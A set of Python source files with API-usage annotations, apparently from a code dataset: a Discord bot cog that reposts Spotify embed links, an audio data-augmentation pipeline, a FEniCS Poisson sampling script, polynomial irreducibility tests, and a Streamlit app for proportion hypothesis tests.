"""Automatically send a reply to Spotify links with a link to the embed preview. Convenient for mobile users who can finally listen to music samples from Discord, without needing an account."""
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, identifier=806715409318936616)
default_guild = {
"spotifyembedEnabled": False,
}
self.config.register_guild(**default_guild)
@commands.group(aliases=["setspembed", "setspe"])
@checks.guildowner_or_permissions()
async def setspotifyembed(self, ctx: commands.Context):
"""Set Spotify Embed settings"""
if not ctx.invoked_subcommand:
# Guild settings
e = discord.Embed(color=(await ctx.embed_colour()), title="Guild Settings", description="")
e.add_field(name="spotifyembedEnabled", value=(await self.config.guild(ctx.guild).spotifyembedEnabled()), inline=False)
await ctx.send(embed=e)
@setspotifyembed.command(name="enable")
async def setspembedenable(self, ctx):
"""Enable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(True)
await ctx.message.add_reaction("✅")
@setspotifyembed.command(name="disable")
async def setspembeddisable(self, ctx):
"""Disable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(False)
await ctx.message.add_reaction("✅")
@commands.command(aliases=["spembed", "spe"])
async def spotifyembed(self, ctx, spotifyLink, asMyself: bool=False):
"""Return a Spotify embed link
Can set asMyself to true/false, for sending as webhook"""
spembedSplit = spotifyLink.split('.com/')
sendMsg = spembedSplit[0] + ".com/embed/" + spembedSplit[1]
if asMyself == False:
return await ctx.send(sendMsg)
elif asMyself == True:
# Find a webhook that the bot made
try:
whooklist = await ctx.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await ctx.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=ctx.author.display_name,
avatar_url=ctx.author.avatar_url,
)
except discord.errors.Forbidden:
return await ctx.send(sendMsg)
else:
return await ctx.send("An error occurred.")
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.bot:
return
if message.webhook_id:
return
if message.guild is None:
return
spotifyembedEnabled = await self.config.guild(message.guild).spotifyembedEnabled()
if spotifyembedEnabled is not True:
return
# Ignore if we find [p]spotifyembed in the trigger message
spembedCommandIgnore = r"^\S{1,9}(spotifyembed|spembed|spe)(?=\s|$)"
spembedCommands = re.findall(spembedCommandIgnore, message.clean_content)
if len(spembedCommands) > 0:
return
# Ignore if we find no spotify links in the trigger message
spembedFinder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)"
spembedMatches = re.findall(spembedFinder, message.clean_content)
if len(spembedMatches) <= 0:
return
sendMsg = ""
for match in spembedMatches:
spembedSplit = match.split('.com/')
sendMsg += spembedSplit[0] + ".com/embed/" + spembedSplit[1] + "\n"
# Find a webhook that the bot made
try:
whooklist = await message.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await message.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=message.author.display_name,
avatar_url=message.author.avatar_url,
)
except discord.errors.Forbidden:
return await message.channel.send(sendMsg)
| [
"aiohttp.ClientSession",
"redbot.core.Config.get_conf",
"redbot.core.checks.guildowner_or_permissions",
"redbot.core.commands.Cog.listener",
"redbot.core.commands.command",
"discord.AsyncWebhookAdapter",
"re.findall",
"redbot.core.commands.group"
]
| [((684, 732), 'redbot.core.commands.group', 'commands.group', ([], {'aliases': "['setspembed', 'setspe']"}), "(aliases=['setspembed', 'setspe'])\n", (698, 732), False, 'from redbot.core import Config, commands, checks\n'), ((738, 772), 'redbot.core.checks.guildowner_or_permissions', 'checks.guildowner_or_permissions', ([], {}), '()\n', (770, 772), False, 'from redbot.core import Config, commands, checks\n'), ((1742, 1786), 'redbot.core.commands.command', 'commands.command', ([], {'aliases': "['spembed', 'spe']"}), "(aliases=['spembed', 'spe'])\n", (1758, 1786), False, 'from redbot.core import Config, commands, checks\n'), ((3246, 3269), 'redbot.core.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (3267, 3269), False, 'from redbot.core import Config, commands, checks\n'), ((494, 546), 'redbot.core.Config.get_conf', 'Config.get_conf', (['self'], {'identifier': '(806715409318936616)'}), '(self, identifier=806715409318936616)\n', (509, 546), False, 'from redbot.core import Config, commands, checks\n'), ((3805, 3860), 're.findall', 're.findall', (['spembedCommandIgnore', 'message.clean_content'], {}), '(spembedCommandIgnore, message.clean_content)\n', (3815, 3860), False, 'import re\n'), ((4099, 4147), 're.findall', 're.findall', (['spembedFinder', 'message.clean_content'], {}), '(spembedFinder, message.clean_content)\n', (4109, 4147), False, 'import re\n'), ((4890, 4913), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (4911, 4913), False, 'import aiohttp\n'), ((2739, 2762), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (2760, 2762), False, 'import aiohttp\n'), ((4984, 5012), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', (['session'], {}), '(session)\n', (5003, 5012), False, 'from discord import Webhook, AsyncWebhookAdapter\n'), ((2837, 2865), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', (['session'], {}), '(session)\n', (2856, 2865), False, 'from discord import Webhook, AsyncWebhookAdapter\n')] |
import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
class Augmentation:
"""A base class for data augmentation transforms"""
pass
class MapLabels:
def __init__(self, class_map, drop_raw=True):
self.class_map = class_map
def __call__(self, dataset, **inputs):
labels = np.zeros(len(self.class_map), dtype=np.float32)
for c in inputs["raw_labels"]:
labels[self.class_map[c]] = 1.0
transformed = dict(inputs)
transformed["labels"] = labels
transformed.pop("raw_labels")
return transformed
class MixUp(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
first_audio, first_labels = inputs["audio"], inputs["labels"]
random_sample = dataset.random_clean_sample()
new_audio, new_labels = mix_audio_and_labels(
first_audio, random_sample["audio"],
first_labels, random_sample["labels"]
)
transformed["audio"] = new_audio
transformed["labels"] = new_labels
return transformed
class FlipAudio(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = np.flipud(inputs["audio"])
return transformed
class AudioAugmentation(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
effects_chain = (
pysndfx.AudioEffectsChain()
.reverb(
reverberance=random.randrange(50),
room_scale=random.randrange(50),
stereo_depth=random.randrange(50)
)
.pitch(shift=random.randrange(-300, 300))
.overdrive(gain=random.randrange(2, 10))
.speed(random.uniform(0.9, 1.1))
)
transformed["audio"] = effects_chain(inputs["audio"])
return transformed
class LoadAudio:
def __init__(self):
pass
def __call__(self, dataset, **inputs):
audio, sr = read_audio(inputs["filename"])
transformed = dict(inputs)
transformed["audio"] = audio
transformed["sr"] = sr
return transformed
class STFT:
eps = 1e-4
def __init__(self, n_fft, hop_size):
self.n_fft = n_fft
self.hop_size = hop_size
def __call__(self, dataset, **inputs):
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps)
transformed = dict(inputs)
transformed["stft"] = np.transpose(stft)
return transformed
class AudioFeatures:
eps = 1e-4
def __init__(self, descriptor, verbose=True):
name, *args = descriptor.split("_")
self.feature_type = name
if name == "stft":
n_fft, hop_size = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_features = self.n_fft // 2 + 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing STFT features with params:\n",
"n_fft: {}, hop_size: {}".format(
n_fft, hop_size
)
)
elif name == "mel":
n_fft, hop_size, n_mel = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_mel = int(n_mel)
self.n_features = self.n_mel
self.padding_value = 0.0
if verbose:
print(
"\nUsing mel features with params:\n",
"n_fft: {}, hop_size: {}, n_mel: {}".format(
n_fft, hop_size, n_mel
)
)
elif name == "raw":
self.n_features = 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing raw waveform features."
)
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if self.feature_type == "stft":
# stft = compute_stft(
# inputs["audio"],
# window_size=self.n_fft, hop_size=self.hop_size,
# eps=self.eps, log=True
# )
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "mel":
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps, log=False
)
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "raw":
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
return transformed
class SampleSegment(Augmentation):
def __init__(self, ratio=(0.3, 0.9), p=1.0):
self.min, self.max = ratio
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
original_size = inputs["audio"].size
target_size = int(np.random.uniform(self.min, self.max) * original_size)
start = np.random.randint(original_size - target_size - 1)
transformed["audio"] = inputs["audio"][start:start+target_size]
return transformed
class ShuffleAudio(Augmentation):
def __init__(self, chunk_length=0.5, p=0.5):
self.chunk_length = chunk_length
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = shuffle_audio(
transformed["audio"], self.chunk_length, sr=transformed["sr"])
return transformed
class CutOut(Augmentation):
def __init__(self, area=0.25, p=0.5):
self.area = area
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = cutout(
transformed["audio"], self.area)
return transformed
class SampleLongAudio:
def __init__(self, max_length):
self.max_length = max_length
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if (inputs["audio"].size / inputs["sr"]) > self.max_length:
max_length = self.max_length * inputs["sr"]
start = np.random.randint(0, inputs["audio"].size - max_length)
transformed["audio"] = inputs["audio"][start:start+max_length]
return transformed
class OneOf:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, dataset, **inputs):
transform = random.choice(self.transforms)
return transform(**inputs)
class DropFields:
def __init__(self, fields):
self.to_drop = fields
def __call__(self, dataset, **inputs):
transformed = dict()
for name, input in inputs.items():
if not name in self.to_drop:
transformed[name] = input
return transformed
class RenameFields:
def __init__(self, mapping):
self.mapping = mapping
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
for old, new in self.mapping.items():
transformed[new] = transformed.pop(old)
return transformed
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def switch_off_augmentations(self):
for t in self.transforms:
if isinstance(t, Augmentation):
t.p = 0.0
def __call__(self, dataset=None, **inputs):
for t in self.transforms:
inputs = t(dataset=dataset, **inputs)
return inputs
class Identity:
def __call__(self, dataset=None, **inputs):
return inputs | [
"random.uniform",
"random.choice",
"ops.audio.compute_stft",
"numpy.flipud",
"random.randrange",
"ops.audio.mix_audio_and_labels",
"numpy.random.randint",
"ops.audio.shuffle_audio",
"pysndfx.AudioEffectsChain",
"ops.audio.read_audio",
"numpy.random.uniform",
"numpy.expand_dims",
"numpy.transpose",
"ops.audio.cutout"
]
| [((2606, 2636), 'ops.audio.read_audio', 'read_audio', (["inputs['filename']"], {}), "(inputs['filename'])\n", (2616, 2636), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((2962, 3058), 'ops.audio.compute_stft', 'compute_stft', (["inputs['audio']"], {'window_size': 'self.n_fft', 'hop_size': 'self.hop_size', 'eps': 'self.eps'}), "(inputs['audio'], window_size=self.n_fft, hop_size=self.\n hop_size, eps=self.eps)\n", (2974, 3058), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((3157, 3175), 'numpy.transpose', 'np.transpose', (['stft'], {}), '(stft)\n', (3169, 3175), True, 'import numpy as np\n'), ((7418, 7448), 'random.choice', 'random.choice', (['self.transforms'], {}), '(self.transforms)\n', (7431, 7448), False, 'import random\n'), ((966, 985), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (983, 985), True, 'import numpy as np\n'), ((1164, 1264), 'ops.audio.mix_audio_and_labels', 'mix_audio_and_labels', (['first_audio', "random_sample['audio']", 'first_labels', "random_sample['labels']"], {}), "(first_audio, random_sample['audio'], first_labels,\n random_sample['labels'])\n", (1184, 1264), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((1601, 1620), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (1618, 1620), True, 'import numpy as np\n'), ((1666, 1692), 'numpy.flipud', 'np.flipud', (["inputs['audio']"], {}), "(inputs['audio'])\n", (1675, 1692), True, 'import numpy as np\n'), ((1902, 1921), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (1919, 1921), True, 'import numpy as np\n'), ((4940, 4975), 'numpy.expand_dims', 'np.expand_dims', (["inputs['audio']", '(-1)'], {}), "(inputs['audio'], -1)\n", (4954, 4975), True, 'import numpy as np\n'), ((5652, 5671), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (5669, 5671), True, 'import numpy as np\n'), ((5836, 5886), 'numpy.random.randint', 'np.random.randint', (['(original_size - target_size - 1)'], {}), '(original_size - target_size - 1)\n', (5853, 5886), True, 'import numpy as np\n'), ((6230, 6249), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (6247, 6249), True, 'import numpy as np\n'), ((6295, 6371), 'ops.audio.shuffle_audio', 'shuffle_audio', (["transformed['audio']", 'self.chunk_length'], {'sr': "transformed['sr']"}), "(transformed['audio'], self.chunk_length, sr=transformed['sr'])\n", (6308, 6371), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((6627, 6646), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (6644, 6646), True, 'import numpy as np\n'), ((6692, 6731), 'ops.audio.cutout', 'cutout', (["transformed['audio']", 'self.area'], {}), "(transformed['audio'], self.area)\n", (6698, 6731), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((7104, 7159), 'numpy.random.randint', 'np.random.randint', (['(0)', "(inputs['audio'].size - max_length)"], {}), "(0, inputs['audio'].size - max_length)\n", (7121, 7159), True, 'import numpy as np\n'), ((2349, 2373), 'random.uniform', 'random.uniform', (['(0.9)', '(1.1)'], {}), '(0.9, 1.1)\n', (2363, 2373), False, 'import random\n'), ((5038, 5145), 'ops.audio.compute_stft', 'compute_stft', (["inputs['audio']"], {'window_size': 'self.n_fft', 'hop_size': 'self.hop_size', 'eps': 'self.eps', 'log': '(False)'}), "(inputs['audio'], window_size=self.n_fft, hop_size=self.\n hop_size, eps=self.eps, log=False)\n", (5050, 5145), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((5240, 5275), 'numpy.expand_dims', 'np.expand_dims', (["inputs['audio']", '(-1)'], {}), "(inputs['audio'], -1)\n", (5254, 5275), True, 'import numpy as np\n'), ((5354, 5389), 'numpy.expand_dims', 'np.expand_dims', (["inputs['audio']", '(-1)'], {}), "(inputs['audio'], -1)\n", (5368, 5389), True, 'import numpy as np\n'), ((5761, 5798), 'numpy.random.uniform', 'np.random.uniform', (['self.min', 'self.max'], {}), '(self.min, self.max)\n', (5778, 5798), True, 'import numpy as np\n'), ((2301, 2324), 'random.randrange', 'random.randrange', (['(2)', '(10)'], {}), '(2, 10)\n', (2317, 2324), False, 'import random\n'), ((2240, 2267), 'random.randrange', 'random.randrange', (['(-300)', '(300)'], {}), '(-300, 300)\n', (2256, 2267), False, 'import random\n'), ((1978, 2005), 'pysndfx.AudioEffectsChain', 'pysndfx.AudioEffectsChain', ([], {}), '()\n', (2003, 2005), False, 'import pysndfx\n'), ((2064, 2084), 'random.randrange', 'random.randrange', (['(50)'], {}), '(50)\n', (2080, 2084), False, 'import random\n'), ((2117, 2137), 'random.randrange', 'random.randrange', (['(50)'], {}), '(50)\n', (2133, 2137), False, 'import random\n'), ((2172, 2192), 'random.randrange', 'random.randrange', (['(50)'], {}), '(50)\n', (2188, 2192), False, 'import random\n')] |
#!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
else: # N(0,1)
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
def wrapper(sample, outfile):
g=sample[1]
u = poisson(gamma=g, mesh=mesh)
# Save solution
fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
File(fname, 'w') << u
return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| [
"fenics.Point",
"numpy.random.rand",
"argparse.ArgumentParser",
"fenics.set_log_level",
"numpy.random.randn",
"fenics.File",
"newpoisson.poisson"
]
| [((261, 278), 'fenics.set_log_level', 'set_log_level', (['(40)'], {}), '(40)\n', (274, 278), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((203, 214), 'fenics.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (208, 214), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((215, 226), 'fenics.Point', 'Point', (['(1)', '(1)'], {}), '(1, 1)\n', (220, 226), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((425, 479), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Poisson Problem"""'}), "(description='Poisson Problem')\n", (448, 479), False, 'import argparse\n'), ((1580, 1607), 'newpoisson.poisson', 'poisson', ([], {'gamma': 'g', 'mesh': 'mesh'}), '(gamma=g, mesh=mesh)\n', (1587, 1607), False, 'from newpoisson import poisson\n'), ((1206, 1244), 'numpy.random.randn', 'np.random.randn', (['num_samples', 'inputdim'], {}), '(num_samples, inputdim)\n', (1221, 1244), True, 'import numpy as np\n'), ((1708, 1724), 'fenics.File', 'File', (['fname', '"""w"""'], {}), "(fname, 'w')\n", (1712, 1724), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((1109, 1136), 'numpy.random.rand', 'np.random.rand', (['num_samples'], {}), '(num_samples)\n', (1123, 1136), True, 'import numpy as np\n'), ((1300, 1337), 'numpy.random.rand', 'np.random.rand', (['num_samples', 'inputdim'], {}), '(num_samples, inputdim)\n', (1314, 1337), True, 'import numpy as np\n')] |
"""
Irreduzibilitätskriterien
Implementiert wurden das Eisenstein- und das Perronkriterium
Quellen:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten
"""
import logging
import helper
import itertools
def factor(n):
# Faktorisierung einer Zahl n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
# Primfaktorzerlegung einer Zahl n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# rekursive Implementierung von HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen würden Ergebnis von HCF verfälschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
Prüft ein Polynom auf Irreduzierbarkeit (Perron).
Führender Koeffizient != 1 funktioniert nicht.
Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
Eine Implementierung des Eisensteinkriteriums.
"""
# Polynom muss einen Grad m >= 1 haben
if polynomial.degree() < 1:
return 2
# Voraussetzung für Eisenstein sind teilerfremde Koeffizienten
if helper.is_polynomial_coprime(polynomial is False):
return 2
# Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
# Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden
return 1
| [
"itertools.combinations",
"helper.prime_factor",
"logging.error",
"helper.is_polynomial_coprime"
]
| [((1295, 1341), 'itertools.combinations', 'itertools.combinations', (['non_zero_polynomial', '(2)'], {}), '(non_zero_polynomial, 2)\n', (1317, 1341), False, 'import itertools\n'), ((2755, 2804), 'helper.is_polynomial_coprime', 'helper.is_polynomial_coprime', (['(polynomial is False)'], {}), '(polynomial is False)\n', (2783, 2804), False, 'import helper\n'), ((3144, 3176), 'helper.prime_factor', 'helper.prime_factor', (['const_coeff'], {}), '(const_coeff)\n', (3163, 3176), False, 'import helper\n'), ((1800, 1833), 'logging.error', 'logging.error', (['"""Polynom ungültig"""'], {}), "('Polynom ungültig')\n", (1813, 1833), False, 'import logging\n')] |
import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
def app():
# title of the app
st.subheader("Proportions")
st.sidebar.subheader("Proportion Settings")
prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])
if prop_choice == "One Proportion":
c1,c2,c3 = st.columns(3)
with c1:
x = int(st.text_input("Hits",20))
n = int(st.text_input("Tries",25))
with c2:
nullp = float(st.text_input("Null:",.7))
alpha = float(st.text_input("Alpha",.05))
with c3:
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat = x/n
tsd = math.sqrt(nullp*(1-nullp)/n)
cise = math.sqrt(p_hat*(1-p_hat)/n)
z = (p_hat - nullp)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = p_hat - abs(me)
upper = p_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
if prop_choice == "Two Proportions":
c1,c2,c3 = st.columns(3)
with c1:
x1 = int(st.text_input("Hits 1",20))
n1 = int(st.text_input("Tries 1",25))
with c2:
x2 = int(st.text_input("Hits 2",30))
n2 = int(st.text_input("Tries 2",50))
with c3:
alpha = float(st.text_input("Alpha",.05))
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat1 = x1/n1
q_hat1 = 1 -p_hat1
p_hat2 = x2/n2
q_hat2 = 1 - p_hat2
pp_hat = (x1+x2)/(n1+n2)
dp_hat = p_hat1 - p_hat2
pq_hat = 1-pp_hat
tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
z = (p_hat1 - p_hat2)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = dp_hat - abs(me)
upper = dp_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
| [
"streamlit.markdown",
"math.sqrt",
"streamlit.write",
"streamlit.radio",
"streamlit.sidebar.radio",
"streamlit.sidebar.subheader",
"streamlit.subheader",
"streamlit.text_input",
"pandas.DataFrame",
"streamlit.columns",
"numpy.arange"
]
